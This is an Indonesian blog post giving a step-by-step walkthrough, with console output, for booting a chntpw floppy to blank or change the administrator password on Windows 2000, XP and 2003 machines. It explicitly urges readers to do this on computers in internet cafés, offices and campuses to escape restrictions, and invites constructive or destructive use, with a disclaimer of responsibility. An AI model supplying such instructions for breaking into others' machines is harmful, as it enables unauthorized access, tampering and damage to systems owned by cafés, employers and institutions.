Hacking Password Administrator
Windows
Written
by Eka Kurniawan
Tuesday, 24
June 2008
Anda jengkel
ketika di warnet (atau kantor, kampus, cafe?) semua utility di komputer di
proteksi ? Anda jengkel ketika diwarnet hanya bisa memakai internet explorer,
yahoo messenger, mirc, dan microsoft office saja ? Anda jengkel ketika
kenyamanan anda berselancar dibatasi ? Mari kita jebol password administrator
pada komputer mereka. Siapkah anda menjadi petualang-petualang baru ? Berikut
ini adalah step by step bagaimana kita dapat menembus sistem operasi windows
dengan status sebagai administrator. Metode ini berlaku untuk sistem operasi
microsoft windows 2000, XP, 2000 server, dan 2003 server.
Berikut ini adalah perangkat-perangkat
yang Anda butuhkan :
- Floppy disk
drive (biasanya komputer di warnet2 menyediakan fasilitas ini)
- Disket 2 buah
- (atau CDROM
jika tidak ada floopy disk) (biasanya komputer di warnet2 juga menyediakan
fasilitas ini)
File-file
pendukung dapat di download di sini
Langkah kerja
(khusus yang menggunakan floppy disk drive dan disket, kalau menggunakan cdrom
akan dibahas pada artikel lainnya):
1. Unzip
file-file pendukung yang sudah di download tadi. (ada 4 komponen yaitu :
install.bat, rawrite2.exe, bd070927.bin, drivers1-070927.zip). ekstrak kedalam
sebuah folder.
2. Masukkan
disket 1 kedalam floppy disk
3. klik 2x file
install.bat, Maka akan muncul kotak command prompt, dan ketik A:\ kemudian
tekan enter.
|
Rawrite 2.0 -
Write disk file to raw floppy diskette
Enter target
diskette drive : A:\
Please insert
a formatted diskette into drive A: and press -ENTER- :
|
4. Setelah
proses selesai, keluarkan disket 1 dan masukkan disket 2
5. Copy
file drivers1-070927.zip (tanpa harus di unzip terlebih
dahulu) kedalam disket 2
6. Restart
komputer yang akan di hack, dan lakukan booting dengan disket 1.
7. Selanjutnya
akan muncul message berikut, (Pada bagian ini, tekan ENTER). Tunggu sampai
proses scanning selesai.
|
Press enter to
boot, or give linux kernel boot option first if needed.
Some that I
have to use once :
- boot nusb
- boot
irqpoll
- boot
nodrivers
boot :
|
8. Selanjutnya
akan ditampilkan message berikut, (pada bagian ini, keluarkan disket 1 dan
masukkan disket 2, kemudian tekan ENTER). Tunggu sampai proses scanning
selesai.
|
Preparing
driver modules to dir /lib/modules/2.6.22.6
Disk drivers
needed !
You may now
insert or swap to the disk drivers floppy. Press enter when done :
|
9. Selanjutnya
akan ditampilkan daftar partition yang ada pada harddisk. kemudian pilih
NOMOR PARTITION yang ada keterangan BOOT (biasanya ini sebagai drive C:\
dimana data SAM disimpan). untuk contoh disini dipilih no. 2
|
Disk
Disk /dev/sda
:
Disk /dev/sdb
:
Candidate
windows partition found :
1
:
/dev/sda1 963 MB
(usb?)
2
:
/dev/sda1 29996 MB BOOT
3
:
/dev/sdb5 60000 MB
Please select
:
Select : [1]
: 2
|
10. Pada
message selanjutnya, langsung tekan ENTER.
|
Step two :
Select path and registry files what is the path to the registry
directory ?
(relative to
windows disk)
[windows/system32/config]
:
|
11. Selanjutnya
akan ditampilkan daftar sesuai dengan gambar berikut. Pada bagian ini
perhatikan tulisan SAM, yang merupakan bagian tempat penyimpanan data user dan
password pada windows. Kemudian pada menu pilihan yang disediakan, pilih no. 1
(password reset (sam system secutiry)), dan tekan ENTER
|
-rw----
1 0
0 262144 jun 24 SAM
-rw---- 1
0
0 262144 jun
24 SECURITY
-rw----
1 0
0 524200 jun
24 DEFAULT
Select which
part of registry to load, use predefined choices or list the files with space
ad delimiter :
1 - password
reset (sam system security)
2 -
recoveryconsole parameter (software)
3 - quit -
return to previous
[1] : 1
|
12. Pada
message yang akan ditampilkan selanjutnya seperti pada gambar berikut, pilih
no. 1 - edit user data and password, dan tekan ENTER
|
chntpw main
interactive menu
loaded hives
<sam> <system> <security>
1 - edit user
data and password
2 - syskey
status nad change
3 - recovery
console setting
-----
4. registry
editor, now with full write support
q - quit
what to do
? [1] : 1
|
13. Selanjutnya akan
ditampilkan message seperti pada gambar berikut. Pada bagian ini akan
ditampilan daftar username dan status dari username tersebut. Dari daftar user
tersebut, pilih username yang berstatus sebagai ADMIN, karena user dengan
status ADMIN inilah yang memiliki hak akses / kewenangan penuh terhadap sistem
komputer. Pada contoh ini dipilih username yang bernama EKURNIAWAN (dengan
status sebagai ADMIN)
|
chtnpw edit user info and
password
RID
username
Admin? Lock?
02f4
Administrator ADMIN
dis/lock
03ec
ekurniawan
ADMIN dis/lock
03f2
thomas disk/lock
03eb Guest
GUEST
Select : ! - quit, . - list
user, 0x<RID> - user with RAID <hex>
or simply enter the username
to change : [Administrator] ekurniawan
|
14. Pada message yang
ditampilkan selanjutnya, pilih menu sesuai dengan yang kita inginkan. apakah
akan menghapus password, mengedit password, mengganti status username yang ada,
dll. Untuk contoh ini dipilih no. 1 - clear (blank) user password. dan tekan
ENTER
|
User edit menu :
1 - clear (blank) user
password
2 - edit (set new)
user password
3 - promote user (make an
administrator)
4 - unlock and enabled user
account
q - quit editing
suer, back to user list
Select : [1] 1
|
15. Kemudian akan muncul teks
yang menyatakan bahwa password sudah dihapus. Selanjutnya pilih tanda seru /
tekan karakter tanda seru "!" pada keyboard, dan tekan
ENTER
|
Password cleared !
Select : ! - quit, . - list
user, 0x<RID> - user with RAID <hex>
selct : !
|
16. Pada menu selanjutnya,
pilih menu huruf "q" untuk keluar, dan tekan ENTER
|
chntpw main interactive menu
loaded hives
<sam><system><security>
1 - edit user data and
password
2 - syskey status and change
3 - recovery control setting
-----
9 - registry editor, now with
full write support
q - quit
what to do ? : [1] q
|
17. Selanjutnya akan
ditampilkan message seperti gambar berikut, yang menyatakan apakah akan di save
aktivitas yang sudah dilakukan tadi, pada bagian ini ketik "Y",
kemudian tekan ENTER.
|
Hives that have changed :
# Name
0 <sam> OK
Step Four : writing back
changes :
about to write
file(s) back ! Do it ? [n] Y
|
Pastikan setelah menekan huruf
"Y" dan ENTER, muncul tulisan : WRITING SAM ! (yang menandakan
bahwa kita sudah berhasil melakukan pengeditan pada SAM)
18. Pada message yang
menyatakan EDIT COMPLETE, tekan huruf "n" dan ENTER
|
Edit complete
You can try again if it some
hpw failed or you selected wrong
new run ? [n] n
|
19. Selanjutnya akan muncul
pesan berikut, dan tekan ALT + CTRL + DEL untuk merestart komputer. (pastikan
disket sudah di keluarkan terlebih dahulu)
|
please ignore the message
about job control, it is not relevant
ah : can't access tty ; job
control turn of
$
|
AKHIRNYA !!!
Setelah restart komputer,
silahkan masuk windows dengan username yang passwordnya sudah kita edit / hapus
tadi (contoh dalam praktek ini user EKURNIAWAN passwordnya BLANK/tanpa
password). Dan jadilah Anda sebagai Administrator pada komputer tersebut.
Dengan status ini, Anda memiliki hak akses / kewenangan penuh untuk melakukan
konfigurasi, instalasi, dsb. Terserah Anda mau melakukan apa saja ! Mau yang
konstruktif silahkan, mau yang desktruktif juga monggo…
CATATAN : Penulis tidak bertanggung jawab terhadap
segala kerusakan sistem komputer yang diakibatkan oleh perbuatan Anda.
0 komentar:
Posting Komentar